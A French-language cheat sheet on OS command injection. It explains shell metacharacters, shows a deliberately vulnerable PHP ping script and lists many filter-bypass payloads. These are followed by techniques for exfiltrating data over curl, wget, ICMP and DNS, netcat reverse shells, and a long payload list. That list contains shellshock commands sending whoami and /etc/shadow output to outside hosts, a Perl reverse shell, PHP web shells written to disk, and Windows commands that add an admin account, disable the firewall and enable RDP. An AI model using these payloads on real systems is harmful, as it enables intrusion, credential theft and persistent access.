Web:Injection de Commandes
Lors de l'exécution d'une commande en ligne prenant en paramètre une entrée utilisateur, il est parfois possible de s'évader du champ d'action prévu par l'ajout de certains caractères:
Les Métacharacteres
; | Le point-virgule est le métacaractère le plus couramment utilisé pour tester une faille d'injection. Le shell exécute toutes les commandes séparées par le point-virgule. & | Il sépare plusieurs commandes sur une ligne de commande. Il exécute la première commande puis la seconde. && | Si la commande précédente à && est réussie, alors seulement elle exécute la commande suivante. | | Redirige les sorties standard de la première commande vers l'entrée standard de la deuxième commande. || | Le || n'exécute la commande suivante que si la commande précédente échoue. `` | Le métacaractère "unquote" est utilisé pour forcer le shell à interpréter et à exécuter la commande à l'interieur. Ex: '$ Variable="OS version `uname -a`" && echo $variable'
Exemple simple de script PHP utilisant ping.
<?php if(isset($_POST["ip"]) && !empty($_POST["ip"])){ $response = shell_exec("timeout 5 bash -c 'ping -c 3 ".$_POST["ip"]."'"); echo $response; } ?>
Au lieu de fournir une ip, il est possible d'injecter une commade par l'utilisation des métacharacteres.
- 127.0.0.1;ls -la
- ;ls -la
- ;ls%20-la
- ;ls%09-la
- (...)
Afficher le contenu d'un fichier PHP
L'injection de la commande ;php -s file.php va permettre d'afficher le contenu du fichier php plutôt que ;cat file.php qui risque lui d'être exécuté.
Contournement de filtres
Si certain filtres sont en place, par exemple en supprimant les caractères d'évasion, on peut tenter un retour à la ligne via l'ajout de %0a.
La commande suivant le %0a sera alors exécutée.
Exemple de filtre maison
// Set blacklist $substitutions = array( '&' => , ';' => , '| ' => , '-' => , '$' => , '(' => , ')' => , '`' => , '||' => , );
On remarque le '| ', ce qui veut dire que le '|' n'est pas filtré s'il n'est pas suivi d'un espace. En y allant à taton on peut retrouver certaines règles.
- 127.0;.0.1
- 12&7.0.0.1
- (...)
Il est donc primordial de jouer avec les espaces!
- 127.0.0.1|cat password.txt
- 127.0.0.1 |cat password.txt
- 127.0.0.1| cat password.txt
- (...)
Une commande possible serait donc:
127.0.0.1%0als -la
On peut se retrouver bloquer par l'encodage des caractères spéciaux via les formulaires web (127.0.0.1%250als -la), il semblerait que curl soit plus permissif, ou alors il faudrait modifier directement le header avant l'envoie de la requête.
Autre type de filtres
Double Encoding
Dans le cas oú l'on aurait quelque chose comme ça:
str_replace("%26", "")
On donc peut tenter un double encoding %%2626 deviendra alors %26.
Sans Espaces
Dans le cas oú les espaces serait supprimmés:
Le Bash Internal Field Separator: $IFS
;cat${IFS}/etc/passwd
SI IFS est blacklisté
;{cat,/etc/passwd}
Utilisation de TAB
;cat%09/etc/passwd
Line-Feed in the middle
;cat%0a/etc/passwd
Utilisation du '+'
;cat+/etc/passwd
Env Variable
;$var='x20';cat${var}/etc/passwd
Sans $ ni {}
;IFS=,;`cat<<</etc,/passwd`
Certains mots blacklistés
Si "cat" ou "passwd" ou "nimp" est blacklisté:
The Wildcard caracters
;/bin/cat /etc/passwd == ;/b*n/c /et*/pawd == ;/b?n/c?? /et?/pa??wd
Unitialized variable $u qui a une valeur nulle
;cat$u /etc$u/passwd
Null Variable
;cat /et``c/pas``swd ;cat /e$()tc/pa$()sswd ;cat /etc$(dlam)/pa$(erde)sswd
Troncation par quote, double quotes, ou backslash
;/bin/c"at" /e"tc"/pa"ss"wd ;/b'i'n/c'a't /e't'c/p'a's's'w'd' ;c\at /e\tc/pa\s\swd/
$@
;c$@at /etc/passwd
Sans Slash
Si le slah est filtré on peut utilisé ${HOME:0;1} qui représente un slash:
;cat ${HOME:0;1}etc${HOME:0;1}passwd
${SHELLOPTS}
De la même façon on peut utilisé ${SHELLOPTS} pour représenter un caractère spécifique:
${SHELLOPTS:3:1} représente un c. ${SHELLOPTS:2:1} représente un a. (À creuser...) ;${SHELLOPTS:3:1}at /etc/p${SHELLOPTS:2:1}sswd
Reverse and Encode
;`echo "dwssap/cte/ tac | rev` ;$(echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d)
Hexadecimal encode
;echo -e "x2fx65x74x63x2fx70x61x73x73x77x64" # (/etc/passwd)
Cheat Sheet
Top 25 des paramètres pouvant conduire à une injection
?cmd={payload} ?exec={payload} ?command={payload} ?execute{payload} ?ping={payload} ?query={payload} ?jump={payload} ?code={payload} ?reg={payload} ?do={payload} ?func={payload} ?arg={payload} ?option={payload} ?load={payload} ?process={payload} ?step={payload} ?read={payload} ?function={payload} ?req={payload} ?feature={payload} ?exe={payload} ?module={payload} ?payload={payload} ?run={payload} ?print={payload}
Fonctions PHP vulnérables
system() exec() shell_exec() open() pcntl_exec() ioctl_exec() eio_syncfs() proc_open() popen()
Command Execution Function Filtered possible Bypass with encoding
system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() Reverse quotation marks are identical shell_exec()
DATA Exfiltration
Il est parfois possible de ne pas avoir de retour de la commande injectée, on peut alors passer par une requête POST et s'envoyer n'importe quel fichier. ([1])
cURL
$ curl -d "ip=127.0.0.1%0acurl -d"@Any_File" -X POST "https://requestbin.net/r/dyc3s5m8"" -X POST http://exemple.com/index.php $ curl -d "@file" -X POST http://domain.com
cURL avec FTP
$ curl -T file ftp://ip -user nick:pass
Netcat
$ nc -l -p {port} < {file to extract}
ICMP
Si l'hôte que vous visez a été renforcé et que des outils tels que netcat, wget et CURL ont été supprimés, vous pouvez encore utiliser certaines techniques. Essayez de faire en sorte que l'hôte envoie un ping à votre boîte et voyez si le protocole ICMP passe à travers les pare-feux qui interviennent. Si c'est le cas, et que l'hôte sous-jacent tourne sous Linux, nous pouvons exfiltrer des données dans les requêtes ICMP en utilisant l'indicateur -p. L'option -p vous permet de spécifier jusqu'à 16 octets de "pad". C'est là que nous stockerons les données que nous voulons exfiltrer.
Nous devons d'abord convertir le fichier en hexadécimal, puis spécifier les données à insérer dans le paquet. Ceci peut être fait avec la ligne suivante :
cat password.txt | xxd -p -c 16 | while read exfile; do ping -p $exfile -c 1 xxx.xxx.xxx.xxx; done
Avec Wireshark, nous pouvons observer les paquets contenant nos données. Vous pouvez écrire un script qui récupère les paquets et réassemble le fichier sur l'hôte.
DNS
De la même manière que ping, DNS peut également être utilisé pour exfiltrer des données. Cette fois, nous allons utiliser chaque ligne de données comme nom d'hôte d'une requête DNS. En surveillant le trafic sur notre machine, nous pouvons réassembler le fichier. Dans ce cas, la commande suivante est soumise dans le cadre de notre requête au serveur vulnérable :
cat password.txt | while read exfile; do host $exfile.contextis.com xxx.xxx.xxx.xxx; done for i in $(cat password.txt); do host $i.hkj.com; done
Comme pour le ping, vous pouvez écrire un script pour récupérer les paquets DNS entrants et réassembler le fichier.
Time based data exfiltration
Extraction caractère par caractère :
$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi real 0m5.007s user 0m0.000s sys 0m0.000s $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi real 0m0.002s user 0m0.000s sys 0m0.000s
Reverse Shell
Avec Netcat:
nc -L -p port -e cmd.exe (Windows) nc -l -p port -e /bin/bash (*nix)
Se connecter
Netcat
$ nc {ip} {port} $ nc {ip} {port} > output
(Windows)
type {file to extract} | nc -L -p {port}
wget
wget --post-data exfile=`cat /path/to/file` http://domain.com wget --post-file file http://domain.com
Telnet
telnet ip port < file
Command Injection/Execution Cheat Sheet
#Both Unix and Windows supported ls||id; ls ||id; ls|| id; ls || id # Execute both ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe) ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º ls %0A id # %0A Execute both (RECOMMENDED)
#Only unix supported `ls` # `` $(ls) # $() ls; id # ; Chain commands
#Not execute but may be interesting > /var/www/html/out.txt #Try to redirect the output to a file < /etc/passwd #Try to send some input to the command
Unix
<!--#exec%20cmd="/bin/cat%20/etc/passwd"--> <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> <!--#exec%20cmd="/usr/bin/id;--> <!--#exec%20cmd="/usr/bin/id;--> /index.html|id| ;id; ;id ;netstat -a; ;system('cat%20/etc/passwd') ;id; |id |/usr/bin/id |id| |/usr/bin/id| ||/usr/bin/id| |id; ||/usr/bin/id; ;id| ;|/usr/bin/id| \n/bin/ls -al\n \n/usr/bin/id\n \nid\n \n/usr/bin/id; \nid; \n/usr/bin/id| \nid| ;/usr/bin/id\n ;id\n |usr/bin/id\n |nid\n `id` `/usr/bin/id` a);id a;id a);id; a;id; a);id| a;id| a)|id a|id a)|id; a|id |/bin/ls -al a);/usr/bin/id a;/usr/bin/id a);/usr/bin/id; a;/usr/bin/id; a);/usr/bin/id| a;/usr/bin/id| a)|/usr/bin/id a|/usr/bin/id a)|/usr/bin/id; a|/usr/bin/id ;system('cat%20/etc/passwd') ;system('id') ;system('/usr/bin/id') %0Acat%20/etc/passwd %0A/usr/bin/id %0Aid %0A/usr/bin/id%0A %0Aid%0A & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & %0a ping -i 30 127.0.0.1 %0a `ping 127.0.0.1` | id & id ; id %0a id %0a `id` $;/usr/bin/id () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5" () { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6" () { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1" () { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7" () { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3" () { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8" () { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9" () { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4" cat /etc/hosts $(`cat /etc/passwd`) cat /etc/passwd %0Acat%20/etc/passwd {{ get_user_file("/etc/passwd") }} system('cat /etc/passwd'); <?php system("cat /etc/passwd");?>
Windows
` || | ; ' '" " "' & && %0a %0a%0d %0Aid %0a id %0a %0Aid%0A %0a ping -i 30 127.0.0.1 %0a %0A/usr/bin/id %0A/usr/bin/id%0A %2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 %20{${phpinfo()}} %20{${sleep(20)}} %20{${sleep(3)}} a|id| a;id| a;id; a;id\n () { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12 | curl http://crowdshield.com/.testing/rce.txt & curl http://crowdshield.com/.testing/rce.txt ; curl https://crowdshield.com/.testing/rce_vuln.txt && curl https://crowdshield.com/.testing/rce_vuln.txt curl https://crowdshield.com/.testing/rce_vuln.txt curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt%7C%7C`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt%7C%7C`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt $(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) dir | dir ; dir $(`dir`) & dir &&dir && dir | dir C:\ ; dir C:\ & dir C:\ && dir C:\ dir C:\ | dir C:\Documents and Settings\* ; dir C:\Documents and Settings\* & dir C:\Documents and Settings\* && dir C:\Documents and Settings\* dir C:\Documents and Settings\* | dir C:\Users ; dir C:\Users & dir C:\Users && dir C:\Users dir C:\Users ;echo%20'<script>alert(1)</script>' echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX | echo "<?php include($_GET['page'])| ?>" > rfi.php ; echo "<?php include($_GET['page']); ?>" > rfi.php & echo "<?php include($_GET['page']); ?>" > rfi.php && echo "<?php include($_GET['page']); ?>" > rfi.php echo "<?php include($_GET['page']); ?>" > rfi.php | echo "<?php system('dir $_GET['dir']')| ?>" > dir.php ; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php & echo "<?php system('dir $_GET['dir']'); ?>" > dir.php && echo "<?php system('dir $_GET['dir']'); ?>" > dir.php echo "<?php system('dir $_GET['dir']'); ?>" > dir.php | echo "<?php system($_GET['cmd'])| ?>" > cmd.php ; echo "<?php system($_GET['cmd']); ?>" > cmd.php & echo "<?php system($_GET['cmd']); ?>" > cmd.php && echo "<?php system($_GET['cmd']); ?>" > cmd.php echo "<?php system($_GET['cmd']); ?>" > cmd.php ;echo '<script>alert(1)</script>' echo '<script>alert(1)</script>'// XXXXXXXXXXX echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX | echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl ; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl & echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl && echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl () { :;}; echo vulnerable 10 eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') eval('ls') eval('pwd') eval('pwd'); eval('sleep 5') eval('sleep 5'); eval('whoami') eval('whoami'); exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') exec('ls') exec('pwd') exec('pwd'); exec('sleep 5') exec('sleep 5'); exec('whoami') exec('whoami'); ;{$_GET["cmd"]} `id` |id | id ;id ;id| ;id; & id &&id ;id\n ifconfig | ifconfig ; ifconfig & ifconfig && ifconfig /index.html|id| ipconfig | ipconfig /all ; ipconfig /all & ipconfig /all && ipconfig /all ipconfig /all ls $(`ls`) | ls -l / ; ls -l / & ls -l / && ls -l / ls -l / | ls -laR /etc ; ls -laR /etc & ls -laR /etc && ls -laR /etc | ls -laR /var/www ; ls -laR /var/www & ls -laR /var/www && ls -laR /var/www | ls -l /etc/ ; ls -l /etc/ & ls -l /etc/ && ls -l /etc/ ls -l /etc/ ls -lh /etc/ | ls -l /home/* ; ls -l /home/* & ls -l /home/* && ls -l /home/* ls -l /home/* *; ls -lhtR /var/www/ | ls -l /tmp ; ls -l /tmp & ls -l /tmp && ls -l /tmp ls -l /tmp | ls -l /var/www/* ; ls -l /var/www/* & ls -l /var/www/* && ls -l /var/www/* ls -l /var/www/* \n \n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\` \n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\` \n/bin/ls -al\n | nc -lvvp 4444 -e /bin/sh| ; nc -lvvp 4444 -e /bin/sh; & nc -lvvp 4444 -e /bin/sh& && nc -lvvp 4444 -e /bin/sh & nc -lvvp 4444 -e /bin/sh nc -lvvp 4445 -e /bin/sh & nc -lvvp 4446 -e /bin/sh| nc -lvvp 4447 -e /bin/sh; nc -lvvp 4448 -e /bin/sh& \necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n \necho INJECTX\nexit\n\033[2Asleep 5\n \necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n | net localgroup Administrators hacker /ADD ; net localgroup Administrators hacker /ADD & net localgroup Administrators hacker /ADD && net localgroup Administrators hacker /ADD net localgroup Administrators hacker /ADD | netsh firewall set opmode disable ; netsh firewall set opmode disable & netsh firewall set opmode disable && netsh firewall set opmode disable netsh firewall set opmode disable netstat ;netstat -a; | netstat -an ; netstat -an & netstat -an && netstat -an netstat -an | net user hacker Password1 /ADD ; net user hacker Password1 /ADD & net user hacker Password1 /ADD && net user hacker Password1 /ADD net user hacker Password1 /ADD | net view ; net view & net view && net view net view \nid| \nid; \nid\n \n/usr/bin/id\n perl -e 'print "X"x1024' || perl -e 'print "X"x16096' | perl -e 'print "X"x16096' ; perl -e 'print "X"x16096' & perl -e 'print "X"x16096' && perl -e 'print "X"x16096' perl -e 'print "X"x16384' ; perl -e 'print "X"x2048' & perl -e 'print "X"x2048' && perl -e 'print "X"x2048' perl -e 'print "X"x2048' || perl -e 'print "X"x4096' | perl -e 'print "X"x4096' ; perl -e 'print "X"x4096' & perl -e 'print "X"x4096' && perl -e 'print "X"x4096' perl -e 'print "X"x4096' || perl -e 'print "X"x8096' | perl -e 'print "X"x8096' ; perl -e 'print "X"x8096' && perl -e 'print "X"x8096' perl -e 'print "X"x8192' perl -e 'print "X"x81920' || phpinfo() | phpinfo() {${phpinfo()}} ;phpinfo() ;phpinfo();// ';phpinfo();// {${phpinfo()}} & phpinfo() && phpinfo() phpinfo() phpinfo(); <?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?> <?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj");?> <?php system("echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");?> <?php system("sleep 10");?> <?php system("sleep 5");?> <?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?> <?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc");?> :phpversion(); `ping 127.0.0.1` & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & ;${@print(md5(RCEVulnerable))}; ${@print("RCEVulnerable")} ${@print(system($_SERVER['HTTP_USER_AGENT']))} pwd | pwd ; pwd & pwd && pwd \r | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f \r\n route | sleep 1 ; sleep 1 & sleep 1 && sleep 1 sleep 1 || sleep 10 | sleep 10 ; sleep 10 {${sleep(10)}} & sleep 10 && sleep 10 sleep 10 || sleep 15 | sleep 15 ; sleep 15 & sleep 15 && sleep 15 {${sleep(20)}} 